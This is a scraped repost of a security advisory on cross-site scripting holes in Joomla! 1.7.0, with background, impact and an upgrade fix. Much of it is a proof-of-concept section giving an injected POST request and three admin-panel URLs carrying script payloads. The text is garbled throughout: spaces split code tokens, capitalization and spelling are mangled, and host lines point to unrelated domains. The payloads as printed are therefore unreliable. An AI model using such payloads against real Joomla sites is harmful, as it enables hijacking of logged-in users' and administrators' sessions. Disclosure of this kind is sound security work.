Joomla! 1.7.0 Multiple xss and repair

Source: Internet
Author: User

 

Joomla! 1.7.0 | Multiple Cross Site Scripting (XSS) Vulnerabilities

 

1. Overview

 

Joomla! 1.7.0 (stable version) contains multiple xss

 

2. Background

 

Joomla is a free and open source content management system (CMS)

Publishing content on the World Wide Web and intranets. It comprises

Controller (MVC) Web application framework that can also be

Used independently.

Joomla is written in PHP, uses object-oriented programming (OOP)

Techniques and software design patterns, stores data in a MySQL

Database, and includes features such as page caching, RSS feeds,

Printable versions of pages, news flashes, blogs, polls, search, and

Support for language internationalization.

 

3. defect description

 

Several parameters (searchword, extension, asset, author) in Joomla!

Core components are not properly sanitized upon submission to

/Index. php url, which allows attacker to conduct Cross Site Scripting

Attack. This may allow an attacker to create a specially crafted URL

That wocould execute arbitrary script code in a victim's browser.

 

4. Affected Versions: <= 1.7.0

 

5. PROOF-OF-CONCEPT/EXPLOIT

 

Component: com_search, parameter: searchword (Browser: IE, Konqueror)

========================================================== ==================================

 

[REQUEST]

POST/joomla17_noseo/index. php http/ 1.1

Host: www.2cto.com

Accept :*/*

Accept-Language: en

User-Agent: MSIE 8.0

Connection: close

Http://www.bkjia.com/joomla17_noseo

Content-Type: application/x-www-form-urlencoded

Content-Length: 456

 

Task = search & Itemid = 435 & searchword = search'; onunload = function () {x = confirm (

String. fromCharCode (89,111,117, 39,118,101, 32,103,111,116, 32,109, 10

1,115,115, 97,103,101, 32,102,114,111,109, 100,109,105,110,105,115, 11

6,114, 97,116,111,114, 68,111, 32,121,111,117, 32,119, 97,110,116

6,111, 32,103,111, 32,116,111, 111,120, 63); alert (String. fromC

HarCode (89,111,117, 39,118,101, 32,103,111,116, 33) ;}; // xsssss

Ssssss & option = com_search

[/REQUEST]

 

++ ++

 

User Login is required to execute the following XSSes.

 

Parameter: extension, Component: com_categories

========================================================== ================

 

Http://www.bkjia.com/joomla17_noseo/administrator/index. php? Option = com_categ

Ories & extension = com_content % 20% 22 onmouseover = % 22 alert % 28/XSS/% 29% 22 style

= % 22 width: 3000px! Important; height: 3000px! Important; z-index: 999999; positi

On: absolute! Important; left: 0; top: 0; % 22% 20x = % 22

 

Parameter: asset, Component: com_media

========================================================== ================

 

Http://www.bkjia.com/joomla17_noseo/administrator/index. php? Option = com_media

& View = images & tmpl = component & e_name = jform_articletext & asset = 1% 22% 20 onmous

Eover = % 22 alert % 28/XSS/% 29% 22 style = % 22 width: 3000px! Important; height: 3000 p

X! Important; z-index: 999999; position: absolute! Important; left: 0; top: 0; % 22x

= % 22 & author =

 

Parameter: author, Component: com_media

========================================================== ================

 

Http://www.bkjia.com/joomla17_noseo/administrator/index. php? Option = com_media

& View = images & tmpl = component & e_name = jform_articletext & asset = & author = 1% 22%

20 onmouseover = % 22 alert % 28/XSS/% 29% 22 style = % 22 width: 3000px! Important; heig

Ht: 3000px! Important; z-index: 999999; position: absolute! Important; left: 0;

P: 0; % 22x = % 22

 

++ ++

 

6. IMPACT

 

Attackers can compromise currently logged-in user/administrator

Session and impersonate arbitrary user actions available under

/Administrator/functions.

 

7. Solutions

 

Upgrade to a later version.

 

8. VENDOR

 

Joomla! Developer Team

Http://www.joomla.org

 

# Yehg []

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.